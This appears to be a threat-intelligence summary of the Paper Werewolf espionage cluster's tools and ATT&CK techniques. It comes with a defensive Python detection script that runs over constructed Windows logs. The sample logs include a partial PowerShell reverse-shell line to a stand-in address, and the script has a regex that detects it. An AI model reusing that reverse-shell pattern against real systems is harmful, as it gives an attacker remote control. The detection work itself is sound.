Espionage cluster Paper Werewolf engages in destructive behavior

Dec. 26, 2024, 8:50 p.m.

Description

The Paper Werewolf cluster, also tracked as GOFFEE, has increased its activity against Russian organizations in the government, energy, finance and media sectors. Initial access relies on phishing emails carrying Microsoft Word attachments with malicious macros. The group has moved beyond cyber espionage to actively disrupting the infrastructure it compromises. It uses PowerShell scripts, custom malware and post-exploitation frameworks such as Mythic, with techniques that include reverse shells, credential interception and destructive actions such as changing account passwords and deleting registry keys. Its arsenal includes PowerRAT, Owowa and Chisel. The combination of open-source frameworks with custom implants makes detection challenging.
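The destructive and post-exploitation behaviour summarised above is what a detection engineer would want to alert on. The following is an added example, not code from the original report or from the threat actor: it runs three rules over constructed Windows telemetry (Security event 4724 password resets, Sysmon event 12 registry key deletion, PowerShell 4104 script blocks) expressed as flattened JSON lines. The hosts, account names, registry key and the 10.0.0.5 address are invented for the sample; the event schema, thresholds and field names are assumptions, not a description of any vendor's log format.

```python
"""Detection rules for the behaviour described above: a burst of password
resets by one account (T1531 Account Access Removal), registry key deletion
from a scripting host, and a PowerShell reverse shell (T1059.001).
Added example with constructed telemetry; not from the original report."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs).  Security 4724 = attempt to reset
# an account's password; Sysmon 12 = registry key created/deleted;
# PowerShell 4104 = script block logging.  Hosts, accounts and 10.0.0.5 are invented.
SAMPLE_EVENTS = r"""
{"ts": "2024-12-20T09:01:10Z", "channel": "Security", "event_id": 4724, "subject": "CORP\\svc-backup", "target": "CORP\\j.ivanov", "host": "FS01"}
{"ts": "2024-12-20T09:01:11Z", "channel": "Security", "event_id": 4724, "subject": "CORP\\svc-backup", "target": "CORP\\a.petrova", "host": "FS01"}
{"ts": "2024-12-20T09:01:12Z", "channel": "Security", "event_id": 4724, "subject": "CORP\\svc-backup", "target": "CORP\\it-admin", "host": "FS01"}
{"ts": "2024-12-20T09:01:13Z", "channel": "Security", "event_id": 4724, "subject": "CORP\\svc-backup", "target": "CORP\\helpdesk", "host": "FS01"}
{"ts": "2024-12-20T10:15:00Z", "channel": "Security", "event_id": 4724, "subject": "CORP\\helpdesk", "target": "CORP\\new.user", "host": "DC01"}
{"ts": "2024-12-20T09:02:30Z", "channel": "Sysmon", "event_id": 12, "event_type": "DeleteKey", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "target_object": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\BackupAgent", "host": "FS01"}
{"ts": "2024-12-20T09:02:31Z", "channel": "Sysmon", "event_id": 12, "event_type": "CreateKey", "image": "C:\\Windows\\System32\\msiexec.exe", "target_object": "HKLM\\SOFTWARE\\Vendor\\App", "host": "FS01"}
{"ts": "2024-12-20T08:58:00Z", "channel": "PowerShell", "event_id": 4104, "script_block": "$c=New-Object System.Net.Sockets.TCPClient('10.0.0.5',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0}", "host": "FS01"}
{"ts": "2024-12-20T08:30:00Z", "channel": "PowerShell", "event_id": 4104, "script_block": "Get-ChildItem C:\\Logs | Where-Object LastWriteTime -lt (Get-Date).AddDays(-30)", "host": "FS01"}
"""

RESET_THRESHOLD = 3                     # distinct accounts reset by one subject
RESET_WINDOW = timedelta(seconds=60)    # within this sliding window
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# A raw TCP client whose stream is then consumed: the classic one-liner reverse shell.
REVERSE_SHELL_RE = re.compile(r"Sockets\.TCPClient\s*\(.*GetStream\s*\(",
                              re.IGNORECASE | re.DOTALL)

def parse_events(text):
    """Parse JSON lines into dicts with a datetime 'ts', sorted by time."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            ev = json.loads(line)
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(ev)
    return sorted(events, key=lambda e: e["ts"])

def detect_password_reset_burst(events):
    """T1531: one subject resetting many accounts in a short window locks
    users out en masse.  Reports the largest distinct-target window per subject."""
    alerts = []
    by_subject = defaultdict(list)
    for ev in events:
        if ev.get("channel") == "Security" and ev.get("event_id") == 4724:
            by_subject[ev["subject"]].append(ev)
    for subject, evs in by_subject.items():
        best, best_ts, start = set(), None, 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > RESET_WINDOW:
                start += 1
            window = {e["target"] for e in evs[start:end + 1]}
            if len(window) > len(best):
                best, best_ts = window, evs[start]["ts"]
        if len(best) >= RESET_THRESHOLD:
            alerts.append({"ts": best_ts, "rule": "password_reset_burst",
                           "technique": "T1531", "host": evs[0]["host"],
                           "subject": subject, "targets": sorted(best)})
    return alerts

def detect_registry_key_deletion(events):
    """Registry key deleted by a scripting host (Sysmon EID 12, DeleteKey).
    The page lists registry key deletion as a destructive action without a
    technique ID, so none is assigned here."""
    alerts = []
    for ev in events:
        if (ev.get("channel") == "Sysmon" and ev.get("event_id") == 12
                and ev.get("event_type") == "DeleteKey"):
            image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
            if image in SCRIPT_HOSTS:
                alerts.append({"ts": ev["ts"], "rule": "registry_key_deletion",
                               "technique": None, "host": ev["host"],
                               "image": image, "key": ev["target_object"]})
    return alerts

def detect_powershell_reverse_shell(events):
    """T1059.001: script block logging shows a TCP client whose stream is
    consumed, i.e. a PowerShell reverse shell."""
    alerts = []
    for ev in events:
        if ev.get("channel") == "PowerShell" and ev.get("event_id") == 4104:
            if REVERSE_SHELL_RE.search(ev.get("script_block", "")):
                alerts.append({"ts": ev["ts"], "rule": "powershell_reverse_shell",
                               "technique": "T1059.001", "host": ev["host"],
                               "script": ev["script_block"][:80]})
    return alerts

def detect(text):
    """Run every rule over the log text and return alerts in time order."""
    events = parse_events(text)
    alerts = []
    for rule in (detect_password_reset_burst, detect_registry_key_deletion,
                 detect_powershell_reverse_shell):
        alerts.extend(rule(events))
    return sorted(alerts, key=lambda a: a["ts"])

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["ts"].isoformat(), a["host"], a["rule"], a["technique"])
```

On the sample, the single helpdesk reset, the msiexec key creation and the benign script block produce nothing; the four resets by one service account in three seconds, the key deletion from powershell.exe and the TCPClient/GetStream script block each produce one alert. The password-reset window and threshold are starting points to tune against a tenant's normal helpdesk volume.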

Date

  • Created: Dec. 25, 2024, 8:12 p.m.
  • Published: Dec. 25, 2024, 8:12 p.m.
  • Modified: Dec. 26, 2024, 8:50 p.m.

Attack Patterns

  • Freyja
  • QwakMyAgent
  • PowerTaskel
  • Owowa
  • PowerRAT
  • Paper Werewolf (the intrusion set itself, also tracked as GOFFEE)
  • T1021.002 Remote Services: SMB/Windows Admin Shares
  • T1543.003 Create or Modify System Process: Windows Service
  • T1564.001 Hide Artifacts: Hidden Files and Directories
  • T1531 Account Access Removal
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1070.004 Indicator Removal: File Deletion
  • T1204.002 User Execution: Malicious File
  • T1082 System Information Discovery
  • T1219 Remote Access Software
  • T1036 Masquerading
  • T1098 Account Manipulation
  • T1027 Obfuscated Files or Information
  • T1041 Exfiltration Over C2 Channel
  • T1566 Phishing
  • T1090 Proxy
  • T1078 Valid Accounts
  • T1003 OS Credential Dumping

Additional Information

  • Media
  • Energy
  • Finance
  • Government
  • Russian Federation